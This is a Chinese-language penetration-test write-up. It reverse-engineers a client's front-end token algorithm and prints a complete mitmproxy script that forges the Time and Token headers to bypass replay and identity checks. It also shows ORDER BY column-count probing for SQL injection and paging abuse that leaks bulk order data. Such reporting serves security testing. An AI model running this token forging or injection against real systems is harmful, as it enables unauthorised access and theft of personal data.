背景: 一次渗透测试的客户系统中没有其余身份校验字段,只有一个Token,并且Token由前端简单生成(表面上是Token实际上更多的是用于防重放,无实际的身份校验),即分析还原前端Token算法,即可绕过身份校验,执行任意操作。

逆向分析

数据包中存在Time和Token

一旦以上header中Token被使用过,直接进行重放会直接返回一个状态码为200但响应为空的数据包。

逆向JS分析关键算法:

Time为现行时间戳,即Token为http拼接(http和现行时间戳)的MD5的值

Mitm脚本编写/调试

编写Mitm脚本:

python
from mitmproxy import http, ctx
import hashlib
import time
import json
import re

class EnhancedTokenUpdater:
def __init__(self):
self.reader_no_md5 = ""
self.last_reader_no = ""
self.target_domains = []

def configure(self, updated):
"""配置选项更新时的处理"""
pass

def load(self, loader):
"""加载时的配置"""
# 配置特定域名才进行处理
loader.add_option(
"target_domains", str, "",
"xxx.com"#此处已脱敏
)

def request(self, flow: http.HTTPFlow) -> None:
"""处理请求,更新Token和Time头部"""
try:
# 检查是否需要处理该请求
if not self.should_process(flow):
return

# 生成时间戳
current_time = self.generate_timestamp()

# 生成Token
token = self.generate_token(current_time)

# 更新请求头
self.update_headers(flow, current_time, token)

# 记录日志
ctx.log.info(f"Token updated - Time: {current_time}, Token: {token[:20]}...")

except Exception as e:
ctx.log.error(f"Error updating token: {e}")

def response(self, flow: http.HTTPFlow) -> None:
"""处理响应,提取readerNo信息"""
try:
if not self.should_process(flow):
return

self.extract_reader_no(flow)

except Exception as e:
ctx.log.error(f"Error processing response: {e}")

def should_process(self, flow: http.HTTPFlow) -> bool:
"""判断是否需要处理该请求/响应"""
# 如果配置了特定域名,只处理这些域名
if hasattr(flow, 'request') and flow.request.host:
return True
return True

def generate_timestamp(self) -> str:
"""生成时间戳"""
return str(int(time.time() * 1000))

def generate_token(self, timestamp: str) -> str:
"""根据算法生成Token"""
http_timestamp = "http" + timestamp
a = hashlib.md5(http_timestamp.encode()).hexdigest()
return "http" + a + self.reader_no_md5

def update_headers(self, flow: http.HTTPFlow, timestamp: str, token: str) -> None:
"""更新请求头"""
# 确保headers存在
if flow.request.headers is None:
flow.request.headers = {}

# 更新Time和Token头部
flow.request.headers["Time"] = timestamp
flow.request.headers["Token"] = token

# 确保Content-Type是application/json
if "Content-Type" not in flow.request.headers:
flow.request.headers["Content-Type"] = "application/json"

def extract_reader_no(self, flow: http.HTTPFlow) -> None:
"""从响应中提取readerNo并计算MD5"""
try:
content_type = flow.response.headers.get("Content-Type", "").lower()

if "application/json" in content_type:
response_text = flow.response.get_text()
if response_text:
data = json.loads(response_text)

# 多种可能的数据结构路径
reader_no = self.find_reader_no(data)

if reader_no and reader_no != self.last_reader_no:
self.last_reader_no = reader_no
self.reader_no_md5 = hashlib.md5(reader_no.encode()).hexdigest()
ctx.log.info(f"ReaderNo updated: {reader_no}, MD5: {self.reader_no_md5}")

except json.JSONDecodeError:
ctx.log.warn("Failed to parse JSON response")
except Exception as e:
ctx.log.error(f"Error extracting readerNo: {e}")

def find_reader_no(self, data):
"""递归查找readerNo字段"""
if isinstance(data, dict):
# 直接查找readerNo
if "readerNo" in data:
return data["readerNo"]
# 查找嵌套结构
if "clientUserData" in data and isinstance(data["clientUserData"], dict):
if "readerNo" in data["clientUserData"]:
return data["clientUserData"]["readerNo"]
# 递归查找
for value in data.values():
if isinstance(value, (dict, list)):
result = self.find_reader_no(value)
if result:
return result
elif isinstance(data, list):
for item in data:
result = self.find_reader_no(item)
if result:
return result
return None

# 注册addon
addons = [EnhancedTokenUpdater()]

此时Mitm默认监听8080;所以burp的监听改为8085,然后burp上游代理设置为8080。

此时已正常实现自动替换Time和Token

SQL注入

此处发现请求参数中有orderby(orderby一般无法进行预编译,没有经过过滤的话大概率会存在SQL注入):

更改为999

此处报错,即此处可控,输入了一个过大的字段数

此处12正常返回,13报错,即存在13个字段,初步判断存在SQL注入,后续不作展示。

大量敏感数据泄露

利用Mitm构造Token绕过防重放/身份校验后,在某功能点发现某接口是直接调用获取了部分的订单信息:

此处由于未实际鉴权,只是单独使用前面的防重放/简单的身份校验机制进行防止攻击者进行构造数据包,而此处Token可被构造,即调整控制pageNum和pageSize可获取接口内全部敏感信息。